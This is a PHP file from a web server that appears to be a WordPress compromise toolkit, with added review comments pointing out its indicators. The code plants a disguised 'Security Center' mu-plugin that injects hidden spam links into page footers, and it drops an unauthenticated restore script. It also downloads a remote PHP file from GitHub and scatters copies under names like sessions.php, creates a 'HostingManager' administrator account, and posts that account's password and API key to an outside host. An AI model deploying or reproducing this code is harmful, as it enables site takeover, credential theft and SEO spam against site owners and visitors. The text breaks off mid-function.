
Current File : /var/www/clients/client9/web9/web/yinserty.php
<?php

// Raise the execution time limit to 300 seconds and show every PHP error in the response.
set_time_limit(300);
error_reporting(E_ALL);
ini_set('display_errors', 1);

/** === GLOBAL VARIABLES AND ENDPOINT DEFINITIONS === */
$endpoint      = "https://aiobacklinks.com/panel/ajax/insert/cc_site.php"; // remote endpoint queried for a site ID
$text_endpoint = "https://aiobacklinks.com/x1c/cc.php"; // remote endpoint that receives the collected URL list
// NOTE(review): HTTP_HOST is taken from the request's Host header, so $domain is client-supplied.
$domain        = (isset($_SERVER['HTTP_HOST'])) ? $_SERVER['HTTP_HOST'] : 'localhost';
$root_dir      = rtrim($_SERVER['DOCUMENT_ROOT'], '/'); // document root with the trailing slash removed
$message       = []; // log lines that are printed on the page
$copied_urls   = []; // URLs of the files this script downloads/copies
$site_id       = null; // holds the site_id returned by the endpoint

/**
 * Deletes this script file (__FILE__) from disk and echoes the outcome.
 *
 * NOTE(review): once this has run, the script itself is gone from the
 * filesystem; files written by the other functions in this script are not
 * touched here.
 */
function removeme() {
    $script_path = __FILE__; // full path of this file

    if (file_exists($script_path)) {
        // @ suppresses the PHP warning; the else branch reports the failure instead.
        if (@unlink($script_path)) {
            echo "✅ Script kendini başarıyla sildi: $script_path";
        } else {
            echo "❌ Script silinemedi. Dosya izinlerinizi kontrol edin.";
        }
    } else {
        echo "⚠️ Dosya zaten mevcut değil veya yol hatalı.";
    }
}
/**
 * Appends a timestamped line to the global $message array.
 *
 * Nothing is written to disk here; the array is printed in the log section
 * of the page rendered at the end of this script.
 *
 * @param string $msg Text of the log entry.
 */
function log_message($msg) {
    global $message;
    $timestamp = date('Y-m-d H:i:s');
    $full_msg  = "[$timestamp] $msg";
    $message[] = $full_msg;


}

/**
 * Recursively deletes a file or a directory tree.
 *
 * Every unlink()/rmdir() warning is suppressed with @, and the result of the
 * per-entry deletions is ignored; only the final rmdir() result is returned.
 *
 * @param string $dir Path of the file or directory to remove.
 * @return bool True if the path does not exist; otherwise the result of
 *              unlink() (file) or of the final rmdir() (directory).
 */
function recursiveDelete($dir) {
    if (!file_exists($dir)) return true;
    if (!is_dir($dir)) return @unlink($dir);

    foreach (scandir($dir) as $file) {
        if ($file === '.' || $file === '..') continue;
        $path = $dir . DIRECTORY_SEPARATOR . $file;
        is_dir($path) ? recursiveDelete($path) : @unlink($path);
    }
    return @rmdir($dir);
}

/**
 * Recursively copies a directory tree.
 *
 * mkdir()/copy() failures are suppressed with @ and not checked, so a true
 * return value does not show that every file was copied.
 *
 * @param string $src Source directory.
 * @param string $dst Destination directory; created with mode 0755 if missing.
 * @return bool False when $src is not a directory, true otherwise.
 */
function recursiveCopy($src, $dst) {
    if (!is_dir($src)) return false;
    if (!file_exists($dst)) @mkdir($dst, 0755, true);

    foreach (scandir($src) as $file) {
        if ($file === '.' || $file === '..') continue;
        $srcPath = $src . DIRECTORY_SEPARATOR . $file;
        $dstPath = $dst . DIRECTORY_SEPARATOR . $file;
        if (is_dir($srcPath)) {
            recursiveCopy($srcPath, $dstPath);
        } else {
            @copy($srcPath, $dstPath);
        }
    }
    return true;
}

/**
 * Reads the installed WordPress version from wp-includes/version.php.
 *
 * The version file is pulled in with include, i.e. it is executed as PHP in
 * this function's scope, and the $wp_version variable it defines is read.
 *
 * @param string $version_file Path to version.php.
 * @return string The value of $wp_version, or 'latest' when the file is
 *                missing, unreadable, or does not set $wp_version.
 */
function get_wp_version($version_file) {
    if (file_exists($version_file) && is_readable($version_file)) {
        include $version_file;
        if (isset($wp_version)) {
            log_message("Detected WordPress version: $wp_version");
            return $wp_version;
        }
    }
    log_message("Version file not found or unreadable, using latest.");
    return 'latest';
}

/**
 * Sends the collected URL list to a remote endpoint as JSON.
 *
 * The entries are trimmed, joined with newlines and posted as
 * {"text": "..."} with Content-Type application/json.
 *
 * NOTE(review): in this script the list passed in is $copied_urls, which
 * also holds the entry added by manage_admin_user() (login URL, username,
 * password and API key in one string), so those credentials leave the server
 * through this request.
 *
 * @param array  $urls         Strings to transmit.
 * @param string $endpoint_url Destination URL.
 * @return bool True only when the response JSON has a truthy 'success' field.
 */
function send_urls_to_endpoint($urls, $endpoint_url) {
    if (empty($urls)) {
        log_message("No URLs to send to text endpoint.");
        return false;
    }
    $text = implode("\n", array_map('trim', $urls));
    $data = ['text' => $text];
    $json_data = json_encode($data);

    $ch = curl_init($endpoint_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $json_data);
    curl_setopt($ch, CURLOPT_TIMEOUT, 20); // add a timeout
    $response = curl_exec($ch);

    if ($response === false) {
        log_message("Error sending URLs to text endpoint: " . curl_error($ch));
        curl_close($ch);
        return false;
    }
    curl_close($ch);

    $response_data = json_decode($response, true);
    if (isset($response_data['success']) && $response_data['success']) {
        log_message("Successfully sent URLs to text endpoint. Inserted: " . ($response_data['inserted_count'] ?? 0));
        return true;
    } else {
        $err = isset($response_data['error']) ? $response_data['error'] : 'Unknown error';
        log_message("Text endpoint error: $err");
        return false;
    }
}

/**
 * POSTs this site's URL (site_url) to $endpoint and stores the returned
 * site_id in the global $site_id.
 *
 * The site URL is built from REQUEST_SCHEME (default 'http') and the global
 * $domain. The returned site_id is accepted only if it is a string and is
 * passed through htmlspecialchars() before being stored.
 *
 * NOTE(review): this request registers the host name of the affected site
 * with the remote service; outbound POSTs to that host are a useful thing to
 * look for in proxy or egress logs.
 *
 * @return bool True when a string site_id was received, false otherwise.
 */
function getSiteIDFromEndpoint() {
    global $endpoint, $site_id, $domain;

    $siteUrl = (isset($_SERVER['REQUEST_SCHEME']) ? $_SERVER['REQUEST_SCHEME'] : 'http') . "://$domain";

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $endpoint);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(['site_url' => $siteUrl]));
    curl_setopt($ch, CURLOPT_TIMEOUT, 20); // add a timeout
    $response = curl_exec($ch);

    if ($response === false) {
        log_message("Error: Could not reach endpoint - " . curl_error($ch));
        curl_close($ch);
        return false;
    }
    curl_close($ch);

    $data = json_decode($response, true);
    if (isset($data['site_id']) && is_string($data['site_id'])) {
        $site_id = htmlspecialchars($data['site_id']);
        log_message("Site ID received from endpoint: $site_id");
        return true;
    } else {
        // The raw response body is written to the log in this branch.
        log_message("Error: Invalid response from endpoint - " . $response);
        return false;
    }
}

/**
 * Writes wp-content/mu-plugins/__secwaf.php, using the global $site_id.
 *
 * The generated file carries a plugin header that names it "Security Center"
 * with author "WordPress". Its code hooks wp_footer, POSTs the site_id to
 * https://aiobacklinks.com/ajax/request/ and echoes the links it gets back
 * inside a <div style="display:none"> wrapper, so they are present in the
 * page HTML but not shown to visitors.
 *
 * Review notes:
 * - WordPress loads files in mu-plugins automatically on every request; they
 *   are not activated or deactivated from the regular plugins screen.
 * - $site_id comes from the remote endpoint's JSON response and is
 *   concatenated into the generated PHP source.
 * - The generated curl call sets no timeout, so each front-end page render
 *   waits on the remote host.
 *
 * @return bool True when the file was written, false when $site_id is empty
 *              or the write failed.
 */
function createSecwafPlugin() {
    global $site_id, $root_dir;

    if (!$site_id) {
        log_message("Error: site_id is empty! __secwaf.php cannot be created.");
        return false;
    }

    $mu_plugins_dir = $root_dir . '/wp-content/mu-plugins/';
    if (!file_exists($mu_plugins_dir)) {
        @mkdir($mu_plugins_dir, 0755, true);
    }
    $secwaf_path = $mu_plugins_dir . '__secwaf.php';

    // Source of the generated file; everything up to the closing quote is written verbatim.
    $secwaf_content = '<?php
/**
 * Plugin Name: Security Center
 * Description: This MU Plugin automatically checks security
 * Author: WordPress
 */
if (!defined("ABSPATH")) {
    exit;
}
function add_backlinks_to_footer_html() {
    $site_id = "' . $site_id . '";
    if (!$site_id) return;
    $url = "https://aiobacklinks.com/ajax/request/";
    $post_data = ["site_id" => $site_id];
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
    $response = curl_exec($ch);
    curl_close($ch);
    echo \'<div style="display:none">\';
    if ($response !== false) {
        $data = json_decode($response, true);
        if (isset($data["status"]) && $data["status"] === "true" && !empty($data["sites"])) {
            echo \'<div class="site-links">\';
            foreach ($data["sites"] as $site) {
                $site_url = esc_url($site["site_url"]);
                $keyword  = esc_html($site["site_keyword"]);
                $nofollow = $site["is_nofollow"] == 1 ? \'rel="nofollow"\' : \'\';
                echo "<a href=\"$site_url\" $nofollow title=\"$keyword\" target=\"_blank\">$keyword</a><br>";
            }
            echo \'</div>\';
        }
    }
    echo \'</div>\';
}
add_action("wp_footer", "add_backlinks_to_footer_html");
';

    if (@file_put_contents($secwaf_path, $secwaf_content) !== false) {
        log_message("MU Plugin (__secwaf.php) created with site_id: " . $site_id);
        return true;
    } else {
        log_message("Error: Could not write __secwaf.php. Check file permissions.");
        return false;
    }
}

/**
 * Creates restore.php inside a new
 * wp-content/uploads/cache-backup-<8 hex characters>/ directory.
 *
 * When the generated file is requested it downloads WordPress from
 * wordpress.org and replaces wp-admin, wp-includes and the core PHP files in
 * the document root.
 *
 * Review notes:
 * - The generated script calls reinstall_wordpress() at top level with no
 *   authentication or parameter check, so any request to its URL starts the
 *   reinstall.
 * - Its public URL is appended to $copied_urls, the list that backupOnly()
 *   and doAll() hand to send_urls_to_endpoint().
 * - An existing restore.php at the target path is left as it is and the
 *   function still returns true.
 *
 * @return bool False only when writing the new file failed.
 */
function create_restore_script() {
    global $root_dir,$domain,$copied_urls;

    $random_dir      = 'cache-backup-' . substr(md5(uniqid()), 0, 8);
    $restore_dir     = $root_dir . '/wp-content/uploads/' . $random_dir;
    $restore_script  = $restore_dir . '/restore.php';
    $restore_url    = "https://$domain/wp-content/uploads/".$random_dir. '/restore.php';
    // The URL is recorded before the file is written, so it is listed even if the write below fails.
    $copied_urls[] = $restore_url;
    // Source of the generated file; everything up to the closing quote is written verbatim.
    $restore_content = '<?php
$messages = [];
function recursiveDelete($dir) {
    global $messages;
    if (!file_exists($dir)) return true;
    if (!is_dir($dir)) return @unlink($dir);
    foreach (scandir($dir) as $file) {
        if ($file === "." || $file === "..") continue;
        $path = $dir . "/" . $file;
        is_dir($path) ? recursiveDelete($path) : @unlink($path);
    }
    return @rmdir($dir);
}
function recursiveCopy($src, $dst) {
    global $messages;
    if (!is_dir($src)) return false;
    if (!file_exists($dst)) @mkdir($dst, 0755, true);
    foreach (scandir($src) as $file) {
        if ($file === "." || $file === "..") continue;
        $srcPath = $src . "/" . $file;
        $dstPath = $dst . "/" . $file;
        is_dir($srcPath) ? recursiveCopy($srcPath, $dstPath) : @copy($srcPath, $dstPath);
    }
    return true;
}
function get_wp_version($version_file) {
    global $messages;
    if (file_exists($version_file) && is_readable($version_file)) {
        include $version_file;
        if (isset($wp_version)) {
            $messages[] = "Detected WordPress version: $wp_version";
            return $wp_version;
        }
    }
    $messages[] = "Version file not found, using latest.";
    return "latest";
}
function reinstall_wordpress() {
    global $messages;
    $root_dir = $_SERVER["DOCUMENT_ROOT"];
    $messages[] = "Starting WordPress reinstall...";
    $version_file = "$root_dir/wp-includes/version.php";
    $wp_version   = get_wp_version($version_file);
    $wp_download_url = ($wp_version === "latest") ? "https://wordpress.org/latest.zip" : "https://wordpress.org/wordpress-$wp_version.zip";
    $temp_file    = "$root_dir/wp_temp.zip";
    $extract_dir  = "$root_dir/wp_temp_extract";
    $backup_dir   = "$root_dir/wp_backup_" . date("Ymd_His");

    // ZIP indir
    $ch = curl_init($wp_download_url);
    $fp = fopen($temp_file, "wb");
    curl_setopt($ch, CURLOPT_FILE, $fp);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    $download_result = curl_exec($ch);
    curl_close($ch);
    fclose($fp);

    if (!$download_result || !file_exists($temp_file)) {
        $messages[] = "Error: Could not download WordPress ZIP.";
        return false;
    }
    $messages[] = "WordPress ZIP downloaded: $temp_file";

    // ZIP aç
    $zip = new ZipArchive();
    if ($zip->open($temp_file) === true) {
        if (!is_dir($extract_dir)) @mkdir($extract_dir, 0755, true);
        $zip->extractTo($extract_dir);
        $zip->close();
        $messages[] = "ZIP extracted to: $extract_dir";
    } else {
        $messages[] = "Error: Could not extract ZIP.";
        @unlink($temp_file);
        return false;
    }

    // Yedek al
    if (!file_exists($backup_dir)) @mkdir($backup_dir, 0755, true);
    if (file_exists("$root_dir/wp-config.php")) {
        @copy("$root_dir/wp-config.php", "$backup_dir/wp-config.php");
        $messages[] = "Backed up wp-config.php";
    }
    if (file_exists("$root_dir/wp-content")) {
        recursiveCopy("$root_dir/wp-content", "$backup_dir/wp-content");
        $messages[] = "Backed up wp-content";
    }

    // Temel WP klasörlerini sil
    $core_dirs = ["wp-admin", "wp-includes"];
    foreach ($core_dirs as $dir) {
        $path = "$root_dir/$dir";
        if (file_exists($path)) {
            recursiveDelete($path);
            $messages[] = "Deleted directory: $dir";
        }
    }

    // Çekirdek dosyaları sil
    $core_files = [
        "index.php","wp-activate.php","wp-blog-header.php","wp-comments-post.php",
        "wp-cron.php","wp-links-opml.php","wp-load.php","wp-login.php",
        "wp-mail.php","wp-settings.php","wp-signup.php","wp-trackback.php","xmlrpc.php"
    ];
    foreach ($core_files as $file) {
        $path = "$root_dir/$file";
        if (file_exists($path)) {
            @unlink($path);
            $messages[] = "Deleted file: $file";
        }
    }

    // Yeni dosyaları kopyala
    $source_dir = "$extract_dir/wordpress";
    recursiveCopy("$source_dir/wp-admin", "$root_dir/wp-admin");
    recursiveCopy("$source_dir/wp-includes", "$root_dir/wp-includes");
    foreach (glob("$source_dir/*.php") as $file) {
        @copy($file, "$root_dir/" . basename($file));
    }
    $messages[] = "WordPress core files installed.";

    // Geçici dosyaları temizle
    recursiveDelete($extract_dir);
    @unlink($temp_file);
    $messages[] = "Cleaned up temporary files.";
    return true;
}

$success = reinstall_wordpress();
header("Content-Type: text/plain; charset=UTF-8");
if ($success) {
    $messages[] = "Reinstall completed successfully.";
} else {
    $messages[] = "Reinstall failed.";
}
foreach ($messages as $msg) {
    echo "$msg\n";
}
?>';

    if (!file_exists($restore_dir)) {
        @mkdir($restore_dir, 0755, true);
    }
    if (!file_exists($restore_script)) {
        if (@file_put_contents($restore_script, $restore_content) !== false) {
            log_message("Restore script created at: $restore_script");
            log_message("Restore script created at: $restore_url");
            return true;
        } else {
            log_message("Error: Could not create restore script at $restore_script");
            return false;
        }
    }
    return true;
}

/**
 * Reinstalls the WordPress core for the currently installed version
 * (determined from wp-includes/version.php).
 *
 * Steps: download the matching ZIP from wordpress.org, extract it, copy
 * wp-config.php and wp-content into a backup directory, delete wp-admin,
 * wp-includes and the listed core files, copy the fresh core in, then remove
 * the ZIP and the extraction directory.
 *
 * Review notes:
 * - Only wp-admin, wp-includes and root-level core files are replaced;
 *   wp-content is copied to the backup but never cleaned, so anything placed
 *   there (for example the mu-plugin and the uploads/ script written by other
 *   functions in this file) is still present afterwards. A site whose core
 *   files verify as clean can therefore still carry these artifacts.
 * - Paths created in the document root: wp_current_version.zip,
 *   wp_temp_extract/ and wp_backup_<Ymd_His>/. The backup directory is not
 *   removed and contains a copy of wp-config.php.
 * - The downloaded archive is extracted without any checksum or signature
 *   verification.
 *
 * @return bool True when the sequence ran to the end; false when the temp
 *              file could not be opened, the download failed, or the ZIP
 *              could not be opened. Copy/delete failures are not detected.
 */
function reinstall_wordpress_current_version() {
    global $root_dir;

    log_message("Starting WordPress reinstall process (no shell_exec)...");
    $version_file    = $root_dir . '/wp-includes/version.php';
    $wp_version      = get_wp_version($version_file);
    $wp_download_url = ($wp_version === 'latest')
        ? "https://wordpress.org/latest.zip"
        : "https://wordpress.org/wordpress-{$wp_version}.zip";
    $temp_file    = $root_dir . '/wp_current_version.zip';
    $extract_dir  = $root_dir . '/wp_temp_extract';
    $backup_dir   = $root_dir . '/wp_backup_' . date('Ymd_His');

    // Download the ZIP
    $fp = @fopen($temp_file, 'wb');
    if (!$fp) {
        log_message("Error: Cannot create temp file for download: $temp_file");
        return false;
    }
    $ch = curl_init($wp_download_url);
    curl_setopt($ch, CURLOPT_FILE, $fp);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 60);
    $download_result = curl_exec($ch);
    curl_close($ch);
    fclose($fp);

    if ($download_result === false || !file_exists($temp_file)) {
        log_message("Error: WordPress ZIP indirilemedi.");
        return false;
    }
    log_message("WordPress ZIP indirildi: $temp_file");

    // Open the ZIP
    $zip = new ZipArchive();
    if ($zip->open($temp_file) === true) {
        if (!is_dir($extract_dir)) @mkdir($extract_dir, 0755, true);
        $zip->extractTo($extract_dir);
        $zip->close();
        log_message("ZIP başarıyla açıldı: $extract_dir");
    } else {
        log_message("ZIP açılamadı.");
        @unlink($temp_file);
        return false;
    }

    // Take a backup
    if (!file_exists($backup_dir)) @mkdir($backup_dir, 0755, true);

    if (file_exists($root_dir . '/wp-config.php')) {
        @copy($root_dir . '/wp-config.php', $backup_dir . '/wp-config.php');
        log_message("wp-config.php yedeği alındı.");
    }
    if (file_exists($root_dir . '/wp-content')) {
        recursiveCopy($root_dir . '/wp-content', $backup_dir . '/wp-content');
        log_message("wp-content yedeği alındı.");
    }

    // Directories to delete
    $core_dirs = ['wp-admin', 'wp-includes'];
    foreach ($core_dirs as $dir) {
        $path = $root_dir . '/' . $dir;
        if (file_exists($path)) {
            recursiveDelete($path);
            log_message("$dir dizini silindi.");
        }
    }

    // Files to delete
    $core_files = [
        'index.php','wp-activate.php','wp-blog-header.php','wp-comments-post.php',
        'wp-cron.php','wp-links-opml.php','wp-load.php','wp-login.php',
        'wp-mail.php','wp-settings.php','wp-signup.php','wp-trackback.php',
        'xmlrpc.php'
    ];
    foreach ($core_files as $file) {
        $path = $root_dir . '/' . $file;
        if (file_exists($path)) {
            @unlink($path);
            log_message("$file dosyası silindi.");
        }
    }

    // Copy the new files
    $source_dir = $extract_dir . '/wordpress';
    recursiveCopy($source_dir . '/wp-admin',   $root_dir . '/wp-admin');
    recursiveCopy($source_dir . '/wp-includes', $root_dir . '/wp-includes');
    foreach (glob($source_dir . '/*.php') as $file) {
        @copy($file, $root_dir . '/' . basename($file));
    }
    log_message("WordPress çekirdek dosyaları başarıyla yüklendi.");

    // Cleanup
    recursiveDelete($extract_dir);
    @unlink($temp_file);
    // (The backup folder could be deleted here as well; that call is left commented out.)
    // recursiveDelete($backup_dir);

    log_message("Geçici dosyalar temizlendi. Reinstall tamamlandı.");
    return true;
}

/**
 * Creates an administrator account named "HostingManager", or resets its
 * password if the account already exists. WordPress functions are made
 * available by loading wp-load.php.
 *
 * Review notes (what to look for on an affected site):
 * - A user with login 'HostingManager'; a newly created one has the e-mail
 *   'admin@example.com' and the administrator role.
 * - A user-meta entry with key 'api_key' on that account.
 * - The clear-text password is written to the page log and, together with
 *   the login URL, username and API key, appended to $copied_urls, the list
 *   that is posted to the remote endpoint by send_urls_to_endpoint().
 * - The fallback branch writes the account straight into the users table
 *   with an MD5 hash of the password.
 *
 * @return bool False when wp-load.php is missing or wp_create_user() fails,
 *              true otherwise.
 */
function manage_admin_user() {
    global $root_dir, $domain, $copied_urls;

    $wp_load_path = $root_dir . '/wp-load.php';
    if (!file_exists($wp_load_path)) {
        log_message("Error: wp-load.php not found, cannot manage admin user!");
        return false;
    }
    require_once $wp_load_path;

    $username = 'HostingManager';
    $random_password = wp_generate_password(12, false);
    $api_key = wp_generate_password(32, false); // 32-character API key

    if (function_exists('wp_create_user') && function_exists('wp_set_password')) {
        $user = get_user_by('login', $username);
        if ($user) {
            // Existing account: only the password and the api_key meta are changed.
            wp_set_password($random_password, $user->ID);
            log_message("Admin user '$username' already exists, password reset to: $random_password");
            update_user_meta($user->ID, 'api_key', $api_key);
        } else {
            $user_id = wp_create_user($username, $random_password, 'admin@example.com');
            if (is_wp_error($user_id)) {
                log_message("Error: Could not create admin user - " . $user_id->get_error_message());
                return false;
            }
            $u = new WP_User($user_id);
            $u->set_role('administrator');
            update_user_meta($user_id, 'api_key', $api_key);
            log_message("Admin user '$username' created with password: $random_password");
        }
    } else {
        // Fallback when the user API functions are unavailable: direct database writes via $wpdb.
        global $wpdb;
        $hashed_password = md5($random_password);
        $user_id = $wpdb->get_var($wpdb->prepare("SELECT ID FROM $wpdb->users WHERE user_login = %s", $username));
        if ($user_id) {
            $wpdb->update($wpdb->users, ['user_pass' => $hashed_password], ['ID' => $user_id]);
            update_user_meta($user_id, 'api_key', $api_key);
            log_message("Admin user '$username' already exists, password reset to: $random_password (MD5 hashed)");
        } else {
            $wpdb->insert(
                $wpdb->users,
                [
                    'user_login'      => $username,
                    'user_pass'       => $hashed_password,
                    'user_nicename'   => $username,
                    'user_email'      => 'admin@example.com',
                    'user_registered' => current_time('mysql'),
                    'user_status'     => 0
                ]
            );
            $new_id = $wpdb->insert_id;
            update_user_meta($new_id, 'wp_user_level', 10);
            update_user_meta($new_id, 'wp_capabilities', serialize(['administrator' => true]));
            update_user_meta($new_id, 'api_key', $api_key);
            log_message("Admin user '$username' created with password: $random_password (MD5 hashed)");
        }
    }

    // Append login URL, username, password and API key to the URL list
    $copied_urls[] = "https://$domain/wp-login.php:$username:$random_password:$api_key";

    return true;
}


/**
 * Downloads PHP files from GitHub and copies them into randomly chosen
 * writable folders of the site under randomly chosen file names.
 *
 * Review notes (what to look for on an affected site):
 * - The single source URL is the raw.githubusercontent.com path listed in
 *   $fileUrls below; the content of that file is not part of this script.
 * - Copies are named sessions.php, cookies.php, caches.php, configs.php or
 *   settings.php and are placed in writable directories at least three path
 *   segments below the document root (see $baseLevel), up to ten folders.
 * - A temporary 'downloaded_files' directory is created next to this script
 *   with mode 0777 and deleted again at the end of a successful run.
 * - Every resulting public URL is appended to $copied_urls.
 *
 * @return bool Result of downloadFilesAndCopyWithRandomNames(): true when at
 *              least one directory received a copy.
 */
function download_github_files() {
    global $root_dir, $domain, $message, $copied_urls;

    $baseDir = $root_dir;

    // 1) Scans for writable subfolders.
    // Returns paths relative to $directory for every writable directory below it.
    function listWritableSubfolders($directory) {
        $writableFolders = [];
        function exploreFolders($currentDir, &$writableFolders, $baseDir) {
            $folders = array_filter(glob($currentDir . '/*'), 'is_dir');
            foreach ($folders as $folder) {
                if (is_writable($folder)) {
                    $writableFolders[] = str_replace($baseDir . '/', '', $folder);
                }
                exploreFolders($folder, $writableFolders, $baseDir);
            }
        }
        exploreFolders($directory, $writableFolders, $directory);
        return $writableFolders;
    }

    // 2) Filters the folders with some logic (example).
    // Keeps folders deeper than $baseLevel segments, groups them by their first
    // $baseLevel segments, takes up to $minPerBase random folders per group and
    // returns at most $randomCountTotal of the shuffled result.
    function filterByMinLengthAndDistributeRandomly($folders, $baseLevel, $randomCountTotal, $minPerBase = 3) {
        $groupedByBase = [];
        foreach ($folders as $folder) {
            $segments = explode('/', $folder);
            if (count($segments) > $baseLevel) {
                $base = implode('/', array_slice($segments, 0, $baseLevel));
                $groupedByBase[$base][] = $folder;
            }
        }
        $result = [];
        foreach ($groupedByBase as $base => $subfolders) {
            shuffle($subfolders);
            $selected = array_slice($subfolders, 0, $minPerBase);
            $result = array_merge($result, $selected);
        }
        shuffle($result);
        return array_slice($result, 0, $randomCountTotal);
    }

    // 3) File download
    // Streams $url into $savePath; success means the file exists and is non-empty.
    function downloadFile($url, $savePath) {
        $ch = curl_init($url);
        $fp = @fopen($savePath, 'wb');
        if (!$fp) {
            log_message("Cannot open file for writing: $savePath");
            return false;
        }
        curl_setopt($ch, CURLOPT_FILE, $fp);
        curl_setopt($ch, CURLOPT_TIMEOUT, 20);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        $ok = curl_exec($ch);
        if ($ok === false) {
            log_message("Curl error downloading $url: " . curl_error($ch));
        }
        curl_close($ch);
        fclose($fp);
        return file_exists($savePath) && filesize($savePath) > 0;
    }

    // 4) Downloads the files and copies them into random folders under random names.
    function downloadFilesAndCopyWithRandomNames($fileUrls, $folders, $fileList, $maxFiles) {
        global $root_dir, $domain, $copied_urls;

        $downloadDir = __DIR__ . '/downloaded_files';
        if (!is_dir($downloadDir)) {
            @mkdir($downloadDir, 0777, true);
        }

        // Download the files
        $downloadedFiles = [];
        foreach ($fileUrls as $url) {
            $fileName = basename(parse_url($url, PHP_URL_PATH));
            $filePath = $downloadDir . '/' . $fileName;
            if (downloadFile($url, $filePath)) {
                $downloadedFiles[] = $filePath;
                $downloadUrl = "https://$domain/downloaded_files/$fileName";
                log_message("Downloaded $url to $downloadUrl");
            } else {
                log_message("Failed to download $url");
                return false;
            }
        }

        $filesCopied = 0;
        $maxFiles    = min($maxFiles, count($folders));
        $used_dirs   = [];

        foreach ($folders as $folder) {
            if ($filesCopied >= $maxFiles) {
                break;
            }
            $randomFile = $downloadedFiles[array_rand($downloadedFiles)];
            $randomName = $fileList[array_rand($fileList)];
            $destinationPath = $root_dir . '/' . $folder . '/' . $randomName;

            // An existing file with the chosen name is never overwritten.
            if (!file_exists($destinationPath)) {
                $destDir = dirname($destinationPath);
                if (!is_dir($destDir)) {
                    @mkdir($destDir, 0755, true);
                }
                if (@copy($randomFile, $destinationPath)) {
                    $urlPath = str_replace($root_dir, '', $destinationPath);
                    $displayUrl = "https://$domain$urlPath";
                    $logMessage = "Copied " . basename($randomFile) . " -> $displayUrl as $randomName";
                    if (strpos($destinationPath, 'wp-admin') !== false) {
                        $logMessage = "<span style='color: green;'>$logMessage</span>";
                    }
                    log_message($logMessage);
                    $copied_urls[] = $displayUrl;
                    $filesCopied++;
                    if (!in_array($destDir, $used_dirs)) {
                        $used_dirs[] = $destDir;
                    }
                } else {
                    log_message("Failed to copy " . basename($randomFile) . " to $destinationPath");
                    return false;
                }
            }
        }

        // If only one folder was used, try copying into a second one as well
        if (count($used_dirs) < 2 && count($folders) >= 2) {
            log_message("Warning: Could not use at least 2 directories, retrying...");
            foreach ($folders as $folder) {
                if ($filesCopied >= $maxFiles) break;
                if (in_array($root_dir . '/' . $folder, $used_dirs)) continue;

                $randomFile = $downloadedFiles[array_rand($downloadedFiles)];
                $randomName = $fileList[array_rand($fileList)];
                $destinationPath = $root_dir . '/' . $folder . '/' . $randomName;

                if (!file_exists($destinationPath)) {
                    $destDir = dirname($destinationPath);
                    if (!is_dir($destDir)) {
                        @mkdir($destDir, 0755, true);
                    }
                    if (@copy($randomFile, $destinationPath)) {
                        $urlPath = str_replace($root_dir, '', $destinationPath);
                        $displayUrl = "https://$domain$urlPath";
                        $logMessage = "Copied " . basename($randomFile) . " -> $displayUrl as $randomName (ensuring 2 dirs)";
                        if (strpos($destinationPath, 'wp-admin') !== false) {
                            $logMessage = "<span style='color: green;'>$logMessage</span>";
                        }
                        log_message($logMessage);
                        $copied_urls[] = $displayUrl;
                        $filesCopied++;
                        if (!in_array($destDir, $used_dirs)) {
                            $used_dirs[] = $destDir;
                        }
                    } else {
                        log_message("Failed to copy " . basename($randomFile) . " to $destinationPath");
                        return false;
                    }
                }
            }
        }

        // Clean up the download folder
        if (file_exists($downloadDir)) {
            recursiveDelete($downloadDir);
            log_message("Cleaned up downloaded files directory: $downloadDir");
        }

        log_message("Files copied to " . count($used_dirs) . " directories.");
        return (count($used_dirs) >= 1);
    }

    // Main procedure
    $writableSubfolders = listWritableSubfolders($baseDir);
    $baseLevel          = 2;
    $randomCountTotal   = 10;
    $minPerBase         = 3;
    $filteredFolders    = filterByMinLengthAndDistributeRandomly($writableSubfolders, $baseLevel, $randomCountTotal, $minPerBase);

    // Example GitHub files
    $fileUrls = [
        "https://raw.githubusercontent.com/asdjakshdkj2/test/refs/heads/main/heh.php"
    ];

    // File names to be assigned at random
    $fileList = ["sessions.php", "cookies.php", "caches.php", "configs.php", "settings.php"];

    // Maximum number of files to copy
    $maxFiles = 15;

    return downloadFilesAndCopyWithRandomNames($fileUrls, $filteredFolders, $fileList, $maxFiles);
}

/**
 * === OPERATIONS TRIGGERED BY THE BUTTONS ===
 * 1) All ("Do Everything")
 * 2) Integrate (site_id and __secwaf.php only)
 * 3) Back up (restore.php, GitHub files, wp-admin user, send URLs to the endpoint)
 * 4) Reinstall WordPress
 */

// 1) All (do everything)
/**
 * Runs every step of the script in sequence.
 *
 * Only a failure to obtain the site ID (first step) or to reinstall
 * WordPress (last step) aborts with false; failures of the steps in between
 * are logged and the run continues.
 *
 * NOTE(review): the collected URL list, including the admin credentials
 * entry added by manage_admin_user(), is posted to $text_endpoint before the
 * core reinstall runs.
 *
 * @return bool True when the first and last steps succeeded.
 */
function doAll() {
    global $copied_urls, $text_endpoint;

    // a) Obtain the site ID
    if (!getSiteIDFromEndpoint()) {
        log_message("HATA: Site ID alınamadı. 'Tümü' süreci iptal ediliyor.");
        return false;
    }
    // b) Create __secwaf.php
    if (!createSecwafPlugin()) {
        log_message("HATA: __secwaf.php oluşturulamadı. İşleme devam ediliyor...");
    }
    // c) Create restore.php
    if (!create_restore_script()) {
        log_message("HATA: restore.php oluşturulamadı. İşleme devam ediliyor...");
    }
    // d) Download and copy the GitHub files
    if (!download_github_files()) {
        log_message("HATA: GitHub dosyaları indirilemedi/kopyalanamadı. İşleme devam ediliyor...");
    }
    // e) Create the admin user
    if (!manage_admin_user()) {
        log_message("HATA: Admin user oluşturulamadı/resetlenemedi. İşleme devam ediliyor...");
    }
    // f) Send the URLs to the endpoint
    if (!empty($copied_urls)) {
